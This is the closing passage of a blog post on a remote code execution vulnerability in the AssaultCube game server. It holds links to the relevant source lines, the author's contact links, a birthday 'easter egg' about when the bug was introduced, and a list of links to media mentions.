Both <a href="https://github.com/assaultcube/AC/blob/master/source/src/server.cpp#L2783">here</a>, and <a href="https://github.com/assaultcube/AC/blob/master/source/src/server.cpp#L3108">here</a>. Would also mention that I deleted my fork of AssaultCube according to the developer’s request.</p>
<p>If you have any questions or suggestions, make sure to hit me in any of these mediums or the comments.</p>
<p><a href="mailto:elongliks@gmail.com">Email</a> , <a href="https://github.com/elongl">Github</a> , <a href="https://twitter.com/elongli">Twitter</a></p>
<p>Thanks for reading.</p>
<h2 id="easter-egg">Easter Egg</h2>
<p>The vulnerability was <a href="https://github.com/assaultcube/AC/commit/9ea5997f535da18a94a5c46bc1e88708f50b95e9">introduced</a> on my birthday.
Guess it was meant to be.</p>
<h2 id="references--mentions">References & Mentions</h2>
<ul>
<li><a href="https://www.google.com/search?q=assaultcube+rce">Google</a></li>
<li><a href="https://twitter.com/search?q=url%3Ae12dedf680e5&source=post_stats_page-------------------------------------">Twitter</a></li>
<li><a href="https://www.facebook.com/search/top/?q=AssaultCube%20RCE%3A%20Technical%20Analysis&source=post_stats_page-------------------------------------">Facebook</a></li>
<li><a href="https://podcasts.google.com/feed/aHR0cHM6Ly9hbmNob3IuZm0vcy9hMTIxYTI0L3BvZGNhc3QvcnNz/episode/OGVmNjY0ODEtNzMxNS00MTQ4LTgyZjgtOTNjYTM4M2UzNzFk?sa=X&ved=0CAIQuIEEahcKEwjwtIXHioDtAhUAAAAAHQAAAAAQRw">Day0 Podcast</a> & <a href="https://podcasts.google.com/feed/aHR0cHM6Ly9hbmNob3IuZm0vcy8zN2ZiM2U3MC9wb2RjYXN0L3Jzcw/episode/NDVlMmQ1NzMtZjRlOS00N2Y2LTg1YzctZjNmYTQwNDBhNjhk?sa=X&ved=0CAIQuIEEahcKEwjwtIXHioDtAhUAAAAAHQAAAAAQRw">GreyHats Podcast</a></li>
<li><a href="https://www.linkedin.com/search/results/content/?keywords=AssaultCube%20RCE%3A%20Technical%20Analysis&source=post_stats_page-------------------------------------">Linkedin</a></li>
</ul>(Also available on Medium)